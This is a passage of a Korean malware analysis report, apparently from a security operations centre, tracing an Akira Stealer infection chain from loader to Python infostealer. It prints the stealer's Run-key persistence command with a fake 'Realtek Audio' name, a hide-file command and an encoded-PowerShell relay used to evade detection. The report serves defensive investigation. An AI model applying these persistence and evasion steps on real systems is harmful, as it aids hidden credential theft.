포함했습니다.",[526,809,810],{},"리버스 엔지니어링 과정은 최초 봉쇄 이후 시작되었습니다. 다음 섹션에서는 이 침해를 조사하기 위해 뒤이어 진행한 기술적 심층 분석을 문서화합니다.",[740,812,814],{"id":813},"_13-대응-요약-빠르고-투명하며-영향-중심의","1.3 대응 요약 – 빠르고, 투명하며, 영향 중심의",[526,816,746],{},[526,818,819],{},"우리의 대응은 속도, 전문성, 운영적 탁월함을 결합했으며, 입증된 워크플로와 고객에 대한 완전한 가시성으로 뒷받침되었습니다.",[630,821,822,828,834,840],{},[633,823,824,827],{},[567,825,826],{},"탐지에서 완전 봉쇄까지 90분 미만","\nDefender 경고, 네트워크 격리, 안티바이러스 스캔, 자격 증명 폐기가 신속하게 그리고 협응하여 실행되었습니다.",[633,829,830,833],{},[567,831,832],{},"48시간 이내 심층 포렌식 대응","\n전체 디스크 및 메모리 분석, 브라우저 아티팩트 검토, 자격 증명 덤핑 탐지, 공격자 활동의 행위적 재구성을 포함합니다.",[633,835,836,839],{},[567,837,838],{},"안전한 데이터 복구 및 증거 처리","\n쿠키, 암호, 토큰, 브라우저 프로필을 포함한 탈취된 데이터를 복구하고, 포렌식적으로 보관한 뒤, 고객에게 안전하게 인계했습니다.",[633,841,842,845],{},[567,843,844],{},"엔드투엔드 가시성 및 커뮤니케이션","\n최초 경고부터 조치 및 디브리핑까지 모든 단계가 완전히 문서화되었고, 실시간으로 공유되었으며, 구조화된 CSIRT 인계 문서로 요약되었습니다.",[847,848,849],"blockquote",{},[526,850,851],{},"이 인시던트는 glueckkanja CSOC가 단지 멀웨어를 멈추는 데 그치지 않고, 그 영향을 해체하고, 고객에게 통제권을 되돌려 주며, 모든 인시던트를 인사이트로 바꾸는 방식을 잘 보여줍니다.",[853,854],"div",{"className":855},[856,857],"space-top-1","space-bottom-1",[557,859,861],{"id":860},"_2-멀웨어-아키텍처-및-실행-체인-개요","2. 멀웨어 아키텍처 및 실행 체인 개요",[526,863,562],{},[526,865,866],{},"영향을 받은 엔드포인트에서 관찰된 멀웨어는 배포, 디코딩, 실행, 데이터 유출로 책임이 명확히 분리된 구조화된 다단계 아키텍처를 따랐습니다.",[740,868,870],{"id":869},"_21-실행-체인-개요","2.1 실행 체인 개요",[526,872,746],{},[526,874,875],{},"관찰된 실행 흐름은 다음과 같았습니다:",[526,877,601],{},[615,879,882],{"className":880,"code":881,"language":620},[618],"​   └── main.exe\n​       └── cmd.exe\n​           └── python.exe astor.py\n",[578,883,881],{"__ignoreMap":530},[526,885,886],{},"체인의 각 구성 요소는 은닉성, 모듈성, 회피에 기여했습니다. 이 아키텍처는 정상 런타임과 표준 OS 인터프리터를 활용해 탐지 메커니즘을 우회했습니다.",[888,889,891],"h3",{"id":890},"_211-출처-불확실성-누락된-초기-침투-벡터","2.1.1 출처 불확실성: 누락된 초기 침투 벡터",[526,893,894],{},"{: .font-size-4}",[526,896,897,898,901,902,905],{},"침해 후 환경에 대한 광범위한 분석에도 불구하고, 초기 접근 벡터는 확정적으로 규명할 수 없었습니다. 이 불확실성은 주로 멀웨어가 ",[567,899,900],{},"탐지 이전 약 6개월 동안"," 활동을 지속했으며, 이는 ",[567,903,904],{},"Microsoft Defender for Endpoint가 적용하는 로그 보존 기간","을 초과했다는 사실에서 기인합니다.",[526,907,908],{},"그 결과, 최초 감염 시점의 텔레메트리나 포렌식 아티팩트를 확보할 수 없었습니다. 전달(delivery) 단계와 관련된 최초 프로세스 생성 이벤트, 파일 드롭, 명령줄 항목은 Defender의 타임라인이나 관련 센서에서 복구할 수 없었습니다.",[526,910,911],{},"맥락 지표와 OSINT 소스에 근거할 때, 가능성 있는 감염 벡터는 다음을 포함할 수 있습니다:",[630,913,914,920,927],{},[633,915,916,917],{},"크랙 또는 개조된 게임 소프트웨어의 ",[567,918,919],{},"트로이목마화된 설치 프로그램",[633,921,922,923,926],{},"포럼과 서드파티 사이트를 통해 배포되는 ",[567,924,925],{},"가짜 유틸리티"," 또는 \"성능 부스터\"",[633,928,929,930],{},"특정 사용자 관심사(예: 암호화폐 관련 도구나 Discord 확장)를 노린 ",[567,931,932],{},"악성 브라우저 확장",[526,934,935],{},"다만 이는 추측에 머무릅니다.",[526,937,938,939,942],{},"조사 과정에서 확인된 드로퍼, 피싱 이메일, 침해된 웹사이트는 식별되지 않았습니다. 멀웨어 아키텍처와 실행 체인은 완전히 재구성되었지만, ",[567,940,941],{},"최초 침해 지점(MITRE ATT&CK T1190 / T1566)"," 은 검증할 수 없었습니다.",[888,944,946,947,949],{"id":945},"_212-updaterexe-초기-로더","2.1.2 ",[578,948,601],{}," – 초기 로더",[526,951,894],{},[526,953,954,955,957],{},"Microsoft 365 Defender에서 프로세스 트리를 검토할 때, ",[578,956,601],{},"는 즉시 눈에 띄었습니다. 그것이 한 일 때문이 아니라, 시스템의 실행 흐름에 얼마나 조용히 스며들었는지 때문이었습니다.",[526,959,960],{},"이 바이너리는 표준 Windows Run 키를 통해 자동 실행되도록 등록되어 있었습니다:",[615,962,965],{"className":963,"code":964,"language":620},[618],"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n",[578,966,964],{"__ignoreMap":530},[526,968,969],{},"이는 사용자가 세션에 로그인할 때마다 실행된다는 것을 의미합니다. 상승된 권한이 필요 없고 EDR 텔레메트리에서 종종 눈에 띄지 않고 넘어가는 전형적인 지속성 메커니즘입니다.",[630,971,972,978,984,990,996],{},[633,973,974,977],{},[567,975,976],{},"파일 유형",": Windows PE 실행 파일(32비트)",[633,979,980,983],{},[567,981,982],{},"서명",": 서명 없음",[633,985,986,989],{},[567,987,988],{},"VirusTotal 탐지",": 분류 시점 기준 69개 엔진 중 1개",[633,991,992,995],{},[567,993,994],{},"실행 컨텍스트",": 중간 무결성, 사용자 세션",[633,997,998,1001,1002],{},[567,999,1000],{},"위치",": ",[578,1003,1004],{},"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",[526,1006,1007],{},"파일 자체는 작고 깔끔하게 컴파일되었으며 정적 분석 관점에서 특이점이 없었습니다. 의심스러운 문자열도, 암호화된 섹션도, 난독화나 패킹의 지표도 없었습니다. 최소한의 표준 Windows API 함수 집합만 가져왔고, 삽입된 페이로드도 포함하지 않았습니다.",[526,1009,1010,1011,1013,1014,1016],{},"그러나 그 동작은 더 많은 것을 시사했습니다. 실행되자마자 ",[578,1012,601],{},"는 번들된 아카이브에서 Electron 애플리케이션을 추출했습니다. 표준 Electron 도구를 사용해 패키징된 독립형 NodeJS 런타임이었습니다. 이 압축 해제된 폴더에는 ",[578,1015,605],{},"라는 실행 파일이 들어 있었고, 이후 자식 프로세스로 실행되었습니다.",[615,1018,1021],{"className":1019,"code":1020,"language":620,"meta":530},[618],"Updater.exe → main.exe\n",[578,1022,1020],{"__ignoreMap":530},[526,1024,1025,1026,1028,1029,1031],{},"이 단계에서는 네트워크 지표도, 프로세스 인젝션도, 권한이나 토큰 상승의 이상 징후도 없었습니다. ",[578,1027,601],{},"의 전체 역할은 로더의 역할, 즉 은닉성과 모듈성을 유지하려는 목적으로 2단계 구성 요소(",[578,1030,605],{},")를 환경에 전달하는 것으로 보였습니다.",[526,1033,1034],{},"이러한 종류의 아키텍처적 분리는 현대의 상용 멀웨어와 스틸러 툴킷에서 흔합니다. 초기 로더는 단순한 배포 스텁 역할을 하며, 종종 난독화되고 인터프리트되거나 동적으로 생성되는 더 무거운 로직을 이후 단계에 담아 둡니다.",[526,1036,1037,1038,1040,1041,1043,1044,1046],{},"이 사례에서 ",[578,1039,601],{},"는 정확히 그 목적을 수행했습니다. 눈에 띄지 않게 섞여들어 탐지되지 않은 채 남아 있으면서, ",[578,1042,605],{},"와 궁극적으로 ",[578,1045,612],{},"에서 실제 스틸러 로직이 실행되도록 길을 닦는 조용한 초기 발판이었습니다.",[526,1048,1049],{},"자신의 디렉터리를 벗어나 파일 시스템을 건드리지 않았고 어떤 행위 규칙도 트리거하지 않았지만, 그것은 길고 치밀하게 구성된 공격 체인의 첫 번째 도미노였습니다.",[888,1051,1053,1054,1056],{"id":1052},"_213-mainexe-난독화된-nodejs-페이로드-컨테이너","2.1.3 ",[578,1055,605],{}," – 난독화된 NodeJS 페이로드 컨테이너",[526,1058,894],{},[526,1060,1061,1063,1064,1066],{},[578,1062,601],{},"가 실행된 뒤, ",[578,1065,605],{},"라는 2단계 바이너리가 실행되었습니다. 이 구성 요소는 표준 Electron 애플리케이션, 즉 Node.js와 Chromium을 번들링한 런타임 환경으로 자신을 위장했습니다. 이 런타임은 크로스 플랫폼 데스크톱 앱에 흔히 사용됩니다. 이처럼 무해해 보이는 성격이 잘못된 손에 들어갔을 때 그것을 위험하게 만드는 요소 중 하나입니다.",[526,1068,1069,1070,1072,1073,1076],{},"검사 결과 ",[578,1071,605],{},"에는 ",[578,1074,1075],{},"app.asar","라는 내부 아카이브가 들어 있었습니다. Electron 기반 애플리케이션의 표준 패키징 형식입니다. 하지만 정상 Electron 앱과 달리, 이 아카이브의 내용물은 전혀 평범하지 않았습니다.",[630,1078,1079,1085,1091,1099],{},[633,1080,1081,1084],{},[567,1082,1083],{},"플랫폼",": Electron(Node.js + Chromium)",[633,1086,1087,1090],{},[567,1088,1089],{},"아키텍처",": 64비트 Windows",[633,1092,1093,1001,1096,1098],{},[567,1094,1095],{},"콘텐츠 구조",[578,1097,1075],{}," 내에 삽입된 JavaScript 파일",[633,1100,1101,1104,1105,1108],{},[567,1102,1103],{},"난독화 수준",": 높음 — 상용 JavaScript 난독화 툴킷인 ",[578,1106,1107],{},"js-confuser","를 통해 달성됨",[526,1110,1111,1112,1114],{},"디컴파일하고 역난독화하자 ",[578,1113,605],{},"의 핵심 로직이 드러났습니다. 그 목적은 GUI를 제공하거나 프론트엔드 로직을 실행하는 것이 아니라, 숨겨진 실행 오케스트레이터로 작동하는 것이었습니다.",[526,1116,1117],{},[567,1118,1119],{},"관찰된 동작:",[630,1121,1122,1125,1131],{},[633,1123,1124],{},"JavaScript 페이로드 내에 저장된 Base64 인코딩 PowerShell 명령을 복호화하고 재구성합니다",[633,1126,1127,1130],{},[578,1128,1129],{},"cmd.exe","를 생성해 PowerShell 명령을 인라인으로 실행합니다",[633,1132,1133,1134,1136,1137,1140],{},"그 PowerShell 명령은 다시 ",[578,1135,580],{},"를 호출하여, 무해해 보이는 디렉터리 구조(",[578,1138,1139],{},"Crypto\\Util\\astor.py",") 아래에 위치한 스크립트를 전달합니다",[615,1142,1145],{"className":1143,"code":1144,"language":620,"meta":530},[618],"main.exe → cmd.exe /d /s /c powershell → python.exe Crypto\\Util\\astor.py\n",[578,1146,1144],{"__ignoreMap":530},[526,1148,1149],{},"이러한 연쇄는 공격자가 실행 컨텍스트를 전환하고 단순한 탐지를 회피할 수 있게 했습니다. 페이로드가 난독화되고 메모리에서 스테이징되었기 때문에, 전통적인 시그니처 기반 통제는 효과가 없었습니다.",[526,1151,1152],{},"Electron 프레임워크는 이상적인 은폐 수단을 제공했습니다. 정밀 조사를 피하면서 임의의 JavaScript를 실행할 수 있게 해 주었습니다. JavaScript 기반 실행은 또한 크로스 플랫폼 호환성을 도입하여, 유연한 배포와 동적 제어 로직의 더 쉬운 통합을 가능하게 했습니다.",[526,1154,1155,1157],{},[578,1156,605],{},"를 특히 위험하게 만든 점은 이미 스테이징된 것 외에 추가 파일을 드롭하지 않고 작동할 수 있는 능력이었습니다. 스틸러 스크립트는 디스크에서 직접 호출되었지만, 모든 스테이징 및 실행 로직은 Electron 번들 안에 삽입된 채로 남아 있었습니다.",[526,1159,1160,1161,1163,1164,1166],{},"요약하면, ",[578,1162,605],{},"는 난독화된 다층 실행 코어로 기능했습니다. 초기 지속성과 ",[578,1165,612],{},"에서의 Akira Stealer 페이로드 완전 활성화 사이의 게이트키퍼 역할을 했습니다.",[888,1168,1170,1171,1173],{"id":1169},"_214-cmdexe-및-powershell-릴레이","2.1.4 ",[578,1172,1129],{}," 및 PowerShell 릴레이",[526,1175,894],{},[526,1177,1178],{},"실행 체인의 이 단계는 릴레이로 기능했습니다. 페이로드 로직을 위한 것이 아니라 난독화와 우회를 위한 것이었습니다.",[526,1180,1181,1183,1184,1186,1187,1190],{},[578,1182,605],{},"가 페이로드를 압축 해제하고 디코딩하는 역할을 마친 뒤, ",[578,1185,1129],{}," 프로세스를 생성했습니다. 이 프로세스 자체는 어떤 악성 로직도 포함하지 않았고, 파일을 쓰거나 수정하지도 않았습니다. 그 유일한 목적은 ",[567,1188,1189],{},"인코딩된 명령","으로 PowerShell 세션을 실행하기 위한 래퍼 역할을 하는 것이었습니다.",[526,1192,1193],{},"이 방법은 가시성을 줄이고 탐지를 회피하기 위해 잘 알려진 전술입니다:",[630,1195,1196,1208],{},[633,1197,1198,1201,1202],{},[567,1199,1200],{},"실행 체인",":",[615,1203,1206],{"className":1204,"code":1205,"language":620},[618],"main.exe → cmd.exe /d /s /c \"powershell -EncodedCommand \u003CBase64Payload>\"\n",[578,1207,1205],{"__ignoreMap":530},[633,1209,1210,1201,1213],{},[567,1211,1212],{},"목적",[630,1214,1215,1218,1221],{},[633,1216,1217],{},"PowerShell 실행을 추가 셸 안에 캡슐화합니다",[633,1219,1220],{},"실제 PowerShell 코드를 로그에서 직접 보이지 않게 숨깁니다",[633,1222,1223,1224,1227],{},"의심스러운 매개변수와 함께 ",[578,1225,1226],{},"powershell.exe","를 직접 사용할 때 트리거되는 EDR를 회피합니다",[526,1229,1230,1231,1233],{},"PowerShell 스크립트를 Base64 인코딩 문자열로 삽입하고 ",[578,1232,1129],{},"를 통해 호출함으로써, 공격자는 여러 형태의 탐지를 회피했습니다:",[630,1235,1236,1241,1246],{},[633,1237,1238],{},[567,1239,1240],{},"명령줄 휴리스틱 필터",[633,1242,1243],{},[567,1244,1245],{},"표준 로깅(예: Event ID 4104, 4688)",[633,1247,1248],{},[567,1249,1250,646,1253,1256,1257,1259],{},[578,1251,1252],{},"-NoProfile",[578,1254,1255],{},"-ExecutionPolicy Bypass"," 같은 ",[578,1258,1226],{}," 인수나 인라인 스크립트에 대한 규칙 기반 탐지",[526,1261,1262,1263,1265,1266,1268],{},"특히 이 PowerShell 명령은 최소화되어 있었고, 삽입된 스틸러 스크립트 ",[578,1264,612],{},"의 경로로 ",[578,1267,580],{},"를 실행하는 데에만 초점이 맞춰져 있었습니다. 추가 모듈은 로드되지 않았고, 메모리에서 눈에 띄는 시그니처도 없었습니다.",[526,1270,1271],{},"이 릴레이 기법은 레드팀 활동과 정교한 인포스틸러 모두에서 흔히 사용됩니다. 구현하기 쉽지만 텔레메트리 상관 분석 없이는 잡기 어려운 경량 회피 계층 역할을 합니다.",[526,1273,1037,1274,1276],{},[578,1275,1129],{},"는 정확히 그 목적을 수행했습니다. JavaScript 로직과 Python 실행 사이의 단순하고 조용한 다리였으며, 거의 눈에 띄지 않고 넘어갈 뻔했습니다.",[888,1278,1280,1281,585,1283],{"id":1279},"_215-pythonexe와-astorpy","2.1.5 ",[578,1282,580],{},[578,1284,612],{},[526,1286,894],{},[526,1288,1289,1290,1292,1293,1295],{},"실행 체인의 마지막이자 가장 영향력 있는 단계는 ",[578,1291,580],{},"가 ",[578,1294,612],{},"를 호출할 때 도달했습니다. 완전히 메모리에서 작동하는 Python 기반 모듈형 인포스틸러였습니다. 이 스크립트는 전체 공격 체인의 운영 핵심을 대표했습니다.",[526,1297,1298,1299,1301],{},"많은 상용 스틸러와 달리, ",[578,1300,612],{},"는 평문으로 배포되지 않았습니다. 다층 복호화 메커니즘으로 보호되어 있었습니다:",[630,1303,1304,1314],{},[633,1305,1306,1309,1310,1313],{},[567,1307,1308],{},"복호화 스택",": 파일은 먼저 GZIP으로 압축된 뒤 ",[567,1311,1312],{},"AES-256-CBC","로 암호화되었습니다.",[633,1315,1316,1319],{},[567,1317,1318],{},"키 파생",": PBKDF2 기반 키 파생 과정(SHA-512, 1,000,000회 반복)이 사용되어, 정적 분석과 무차별 대입을 매우 비현실적으로 만들었습니다.",[526,1321,1322],{},"런타임에 복호화되면, 스크립트는 모두 민감한 데이터 소스를 노리는 여러 전문 모듈을 실행했습니다:",[526,1324,1325],{},[567,1326,1327],{},"핵심 기능",[630,1329,1330,1336,1346,1356],{},[633,1331,1332,1335],{},[567,1333,1334],{},"브라우저 데이터 추출",": Chromium 기반 브라우저(Chrome, Edge, Brave, Opera)에서 로그인 자격 증명, 쿠키, 자동 완성 데이터를 회수합니다",[633,1337,1338,1341,1342,1345],{},[567,1339,1340],{},"토큰 수집",": 특히 ",[567,1343,1344],{},"Discord","에서 세션 토큰을 수집하고, 암호화폐 지갑 확장을 스캔합니다",[633,1347,1348,1351,1352,1355],{},[567,1349,1350],{},"데이터 패키징",": 수집한 모든 데이터를 구조화된 ",[567,1353,1354],{},"ZIP 아카이브","로 집계하며, 공격자 측 파싱을 위해 디렉터리 및 파일 컨텍스트를 보존합니다",[633,1357,1358,1361],{},[567,1359,1360],{},"유출",": 결과 아카이브를 공개 API와 인프라에 업로드합니다.",[526,1363,1364],{},[567,1365,994],{},[526,1367,1368],{},"전체 스틸러 로직은 메모리에서 실행되었으며, 디스크에 영구 파일을 쓰지 않았습니다. 프로세스 내 메모리 아티팩트와 표준 하위 프로세스 호출 외에는 최소한의 텔레메트리 흔적만 남겼습니다. 이 단계에서 지속성을 확립하려는 시도는 없었습니다. 목표는 빠르고 효율적이며 조용한 데이터 탈취였습니다.",[526,1370,1371],{},"유출에 정상 API를 사용한 점 또한 탐지와 차단을 훨씬 어렵게 만들었습니다. 아웃바운드 트래픽이 일상적인 인터넷 활동에 섞여 들었기 때문입니다.",[526,1373,1374,1375,1377],{},"이 단계는 궁극적으로 멀웨어의 정체를 확인시켜 주었습니다. ",[567,1376,676],{},"의 변종으로, 다음으로 알려져 있습니다:",[630,1379,1380,1383,1386,1389],{},[633,1381,1382],{},"높은 모듈성",[633,1384,1385],{},"런타임 난독화",[633,1387,1388],{},"Telegram을 통한 상업적 배포",[633,1390,1391],{},"자격 증명 수집과 토큰 기반 세션 하이재킹에 대한 강한 집중",[526,1393,1394,1395,1397],{},"앞선 단계들과 함께, ",[578,1396,612],{},"는 은밀하고 잘 설계된 인포스틸러 체인의 결정적 종착점을 형성했습니다. 다음 섹션에서는 이 구성 요소를 더 자세히 해부하고, 우리가 그 로직을 어떻게 역분석하고, 인프라를 매핑하며, 그 작전에 사용된 모든 침해 지표를 복구했는지 설명합니다.",[557,1399,1401,1402],{"id":1400},"_3-심층-분석-updaterexe","3. 심층 분석: ",[578,1403,601],{},[526,1405,562],{},[526,1407,1408,1410],{},[578,1409,601],{},"는 침해 후 분석에서 관찰된 최초 바이너리였습니다. 중립적인 외양과 미미한 탐지 흔적에도 불구하고, 멀웨어의 운영 지속성을 유지하고 다음 단계 페이로드를 전달하는 데 중요한 역할을 했습니다.",[740,1412,1414],{"id":1413},"_31-속성","3.1 속성",[526,1416,746],{},[1418,1419,1420,1433],"table",{},[1421,1422,1423],"thead",{},[1424,1425,1426,1430],"tr",{},[1427,1428,1429],"th",{},"속성",[1427,1431,1432],{},"값",[1434,1435,1436,1447,1457,1467,1477,1487],"tbody",{},[1424,1437,1438,1444],{},[1439,1440,1441],"td",{},[567,1442,1443],{},"형식:",[1439,1445,1446],{},"Windows Portable Executable (PE32)",[1424,1448,1449,1454],{},[1439,1450,1451],{},[567,1452,1453],{},"아키텍처:",[1439,1455,1456],{},"x86-64",[1424,1458,1459,1464],{},[1439,1460,1461],{},[567,1462,1463],{},"크기:",[1439,1465,1466],{},"~154 KB",[1424,1468,1469,1474],{},[1439,1470,1471],{},[567,1472,1473],{},"엔트로피:",[1439,1475,1476],{},"정상(비패킹)",[1424,1478,1479,1484],{},[1439,1480,1481],{},[567,1482,1483],{},"서명:",[1439,1485,1486],{},"없음",[1424,1488,1489,1494],{},[1439,1490,1491],{},[567,1492,1493],{},"VirusTotal 탐지:",[1439,1495,1496],{},"분석 시점 기준 1/69",[526,1498,1499],{},"이 파일은 깨끗한 임포트 테이블을 보였고 삽입된 문자열 지표가 없었습니다. 알려진 패커, 크립터, 런타임 난독화 메커니즘은 탐지되지 않았습니다. 그 구조는 맞춤 컴파일된 바이너리와 일치했습니다.",[740,1501,1503],{"id":1502},"_32-행위-분석","3.2 행위 분석",[526,1505,746],{},[526,1507,1508],{},[567,1509,1510],{},"사용자 상호작용 불필요",[526,1512,1513,1514,1516],{},"멀웨어 체인은 어떤 사용자 상호작용도 없이 실행되었습니다. Defender의 프로세스 텔레메트리에 근거할 때, 최초 바이너리(",[578,1515,601],{},")는 자동으로 실행되었으며, 가장 가능성이 높은 것은 레지스트리 자동 실행 키 같은 지속성 메커니즘을 통한 것이었습니다. 그러나 침해가 오래되었고 과거 이벤트 로그가 없었기 때문에, 정확한 지속성 방법은 복구할 수 없었습니다.",[526,1518,1519],{},[567,1520,1521],{},"조용한 실행 및 스테이징",[526,1523,1524,1525,1527,1528,1530],{},"실행 시 ",[578,1526,601],{},"는 시각적 창이나 사용자 프롬프트 없이 즉시 ",[578,1529,605],{},"를 실행했습니다. 스테이징은 백그라운드에서 조용히 이루어졌습니다. 사용자 동의 대화상자, UAC 프롬프트, GUI 구성 요소의 흔적은 없었습니다.",[526,1532,1533],{},[567,1534,1535],{},"페이로드 배포 동작",[526,1537,1538,1540],{},[578,1539,605],{},"는 Electron 애플리케이션 구조의 일부로 확인되었지만, 그 배포의 정확한 출처는 불분명하게 남아 있습니다. 다음 중 하나로 추정됩니다:",[630,1542,1543,1549],{},[633,1544,1545,1546,1548],{},"페이로드가 ",[578,1547,601],{}," 내부에 번들되어 있었을 수 있습니다(예: 삽입된 리소스), 또는",[633,1550,1551],{},"원격 소스에서 회수되었을 수 있습니다",[526,1553,1554],{},"네트워크 텔레메트리가 없고 하드코딩된 URL도 복구되지 않았기 때문에, Electron 앱의 전달 벡터는 결론에 이르지 못한 채 남아 있습니다.",[526,1556,1557],{},[567,1558,1559],{},"프로세스 체인 동작",[526,1561,1562,1563,1565,1566,1568],{},"실행되자마자 ",[578,1564,601],{},"는 ",[578,1567,605],{},"를 자식 프로세스로 생성했습니다. 이 호출은 비대화형이었고, 체인에서 생성된 어떤 프로세스도 UI 활동을 보이지 않았습니다. 프로세스 체인은 예상대로 이어졌습니다:",[615,1570,1573],{"className":1571,"code":1572,"language":620},[618],"Updater.exe → main.exe → cmd.exe → powershell (encoded) → python.exe astor.py\n",[578,1574,1572],{"__ignoreMap":530},[526,1576,1577],{},"모든 실행 단계는 사용자 입력을 요구하지 않고 작동했으며, 사전 구성된 실행 로직과 조용한 실행 경로에만 의존했습니다. 이는 노출을 최소화했고, 멀웨어가 장기간 탐지되지 않은 채 남아 있도록 도왔습니다.",[740,1579,1581],{"id":1580},"_33-감염-체인에서의-역할","3.3 감염 체인에서의 역할",[526,1583,746],{},[526,1585,1586,1588,1589,1592,1593,1595],{},[578,1587,601],{},"는 더 넓은 감염 체인 안에서 ",[567,1590,1591],{},"단 하나이지만 필수적인 역할","을 했습니다. 2단계 구성 요소인 ",[578,1594,605],{},"의 지속성과 재배포를 담당했습니다.",[526,1597,1598],{},[567,1599,1600],{},"확인된 특성",[630,1602,1603,1609,1614],{},[633,1604,1605,1606],{},"악성 로직을 직접 포함하거나 실행하지 ",[567,1607,1608],{},"않았습니다",[633,1610,1611,1612],{},"어떤 데이터 유출도 수행하지 ",[567,1613,1608],{},[633,1615,1616,1617],{},"브라우저 자격 증명 저장소나 민감한 사용자 데이터와 상호작용하지 ",[567,1618,1608],{},[526,1620,1621,1622,1624],{},"그 유일한 목적은 사용자 로그인 시 ",[578,1623,605],{},"를 조용히 실행하는 것이었으며, 지속성 방법으로는 레지스트리 자동 실행 항목이 가장 가능성이 높았습니다(텔레메트리 제약으로 직접 복구되지는 않았습니다).",[526,1626,1627,1628,1630,1631,1633],{},"격리된 1단계 로더로 작동함으로써, ",[578,1629,601],{},"는 실제 스틸러 페이로드(",[578,1632,612],{},")가 더 깊은 실행 계층에 숨겨진 채로 남아 있도록 보장했습니다. 이러한 임무 분리는 공격자가 다음을 할 수 있게 했습니다:",[630,1635,1636,1639,1642],{},[633,1637,1638],{},"정적 AV나 샌드박스 시스템에 의한 상관 분석 회피",[633,1640,1641],{},"로더를 수정하지 않고 페이로드를 교체하거나 업데이트",[633,1643,1644],{},"진입점에서의 행위 신호 감소",[526,1646,1647,1648,1651],{},"이 패턴은 전달 메커니즘이 일반적이고 페이로드가 모듈형이거나 클라이언트별로 맞춤화되는 ",[567,1649,1650],{},"멀웨어 서비스형(MaaS)"," 작전에서 전형적입니다.",[526,1653,1037,1654,1656],{},[578,1655,601],{},"는 신뢰할 수 있고 은밀한 진입점 역할을 하기에 딱 필요한 만큼의 로직만 제공했습니다. 그 이상도 아니지만, 그 이하도 아니었습니다.",[740,1658,1660],{"id":1659},"_34-레지스트리를-통한-지속성astorpy에서-확인됨","3.4 레지스트리를 통한 지속성(astor.py에서 확인됨)",[526,1662,746],{},[526,1664,1665,1666,1668],{},"Python 페이로드의 정적 분석 결과, ",[578,1667,601],{},"가 레지스트리 자동 실행 항목을 사용해 명시적으로 지속된다는 것이 밝혀졌습니다:",[630,1670,1671,1679,1687],{},[633,1672,1673,1001,1676],{},[567,1674,1675],{},"레지스트리 경로",[578,1677,1678],{},"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",[633,1680,1681,1001,1684],{},[567,1682,1683],{},"값 이름",[578,1685,1686],{},"Realtek Audio",[633,1688,1689,1001,1692],{},[567,1690,1691],{},"페이로드 경로",[578,1693,1694],{},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe",[526,1696,1697],{},"해당 레지스트리 명령은 PowerShell을 통해 실행됩니다:",[615,1699,1703],{"className":1700,"code":1701,"language":1702,"meta":530,"style":530},"language-powershell shiki shiki-themes github-light github-dark","reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Realtek Audio\" /t REG_SZ /d \"...\\Updater.exe\" /f\n","powershell",[578,1704,1705],{"__ignoreMap":530},[1706,1707,1710],"span",{"class":1708,"line":1709},"line",1,[1706,1711,1701],{},[526,1713,1714],{},"이는 사용자가 로그인할 때마다 멀웨어가 실행되도록 보장합니다. 또한 이 파일은 탐지를 더욱 회피하기 위해 숨김 및 시스템 속성으로 표시됩니다:",[615,1716,1718],{"className":1700,"code":1717,"language":1702,"meta":530,"style":530},"attrib +h +s \"Updater.exe\"\n",[578,1719,1720],{"__ignoreMap":530},[1706,1721,1722],{"class":1708,"line":1709},[1706,1723,1717],{},[526,1725,1726],{},"이 지속성 메커니즘은 astor.py 코드에 직접 삽입되어 있었으며, 이는 최종 단계 스틸러가 디스크와 시작 프로그램 레지스트리에서 로더의 존재를 능동적으로 유지한다는 것을 확인시켜 줍니다.",[740,1728,1730],{"id":1729},"_35-요약","3.5 요약",[526,1732,746],{},[847,1734,1735],{},[526,1736,1737,1739],{},[578,1738,601],{},"는 구조나 내용 자체로는 본질적으로 악성이 아니었지만, 실행 체인 내에서의 맥락적 동작이 멀웨어 로더로서의 역할을 확인시켜 주었습니다.",[853,1741],{"className":1742},[856],[526,1744,1745],{},"이 바이너리는 깔끔하고 최소주의적인 1단계 런처 역할을 했습니다. 정적 분석, AV 엔진, 행위 규칙에 의한 탐지를 회피했습니다. 그 설계는 악성 로직 자체를 실행하는 것이 아니라 오로지 은닉성과 운영 지원에 초점이 맞춰져 있었습니다.",[526,1747,1748,1749,1751,1752,1754,1755,1758],{},"그러나 그 역할은 초기 배포를 넘어섰습니다. ",[578,1750,612],{}," 페이로드를 리버스 엔지니어링하는 과정에서, 우리는 ",[578,1753,601],{},"의 존재를 능동적으로 확인하는 로직을 발견했습니다. 이 확인은 스틸러 코드 내에 구현된 더 넓은 ",[567,1756,1757],{},"상태 점검 및 자가 치유 주기","의 일부였습니다. 감염 체인의 무결성을 검증하고 누락된 구성 요소를 필요 시 복원하도록 설계된 메커니즘입니다.",[526,1760,1761,1762,1764,1765,1768],{},"이는 ",[578,1763,601],{},"가 단지 멀웨어를 시작하는 역할만 한 것이 아니라, 그 ",[567,1766,1767],{},"지속적인 런타임 검증","의 일부를 형성했음을 의미합니다. 이 스텁이 없으면 멀웨어는 향후 세션에서 스스로를 재초기화하는 능력을 잃을 수 있습니다.",[526,1770,1771],{},[567,1772,1773,1775],{},[578,1774,601],{},"의 핵심 기능:",[630,1777,1778,1783,1788,1791],{},[633,1779,1780,1782],{},[578,1781,605],{},"의 원활한 배포",[633,1784,1785,1787],{},[578,1786,612],{},"의 간접 실행",[633,1789,1790],{},"로더와 페이로드 로직의 분리",[633,1792,1793,1794],{},"운영 상태 모니터링의 일부로 ",[567,1795,1796],{},"페이로드 자체에서 참조됨",[526,1798,1799],{},"섹션 5에서는 스틸러의 내부 상태 점검 루틴, 자가 치유 동작, 무결성 검증 메커니즘을 자세히 다룹니다.",[526,1801,1802,1803,1805],{},"지금으로서는 ",[578,1804,601],{},"가 이 계층화된 인포스틸러 아키텍처에서 점화 장치이자 고정점 역할을 했다는 점이 분명합니다.",[740,1807,1809],{"id":1808},"_36-추출-트릭-로더를-앞지르기","3.6 추출 트릭: 로더를 앞지르기",[526,1811,746],{},[526,1813,1814],{},"때로는 최고의 리버스 엔지니어링 성과가 깊은 바이너리 디스어셈블에서 나오는 것이 아니라, 약간의 잔꾀와 인내에서 나옵니다.",[526,1816,1817,1818,1820,1821,1823],{},"통제된 실험실 환경에서 감염을 분석하던 중, 우리는 이상한 점을 발견했습니다. ",[578,1819,601],{},"는 존재하며 실행 중이었지만, ",[578,1822,605],{},"는 파일 시스템에서 사라져 있었습니다. 그때 한 가지 아이디어가 떠올랐습니다. 멀웨어가 스스로를 복구하도록 두면 어떻게 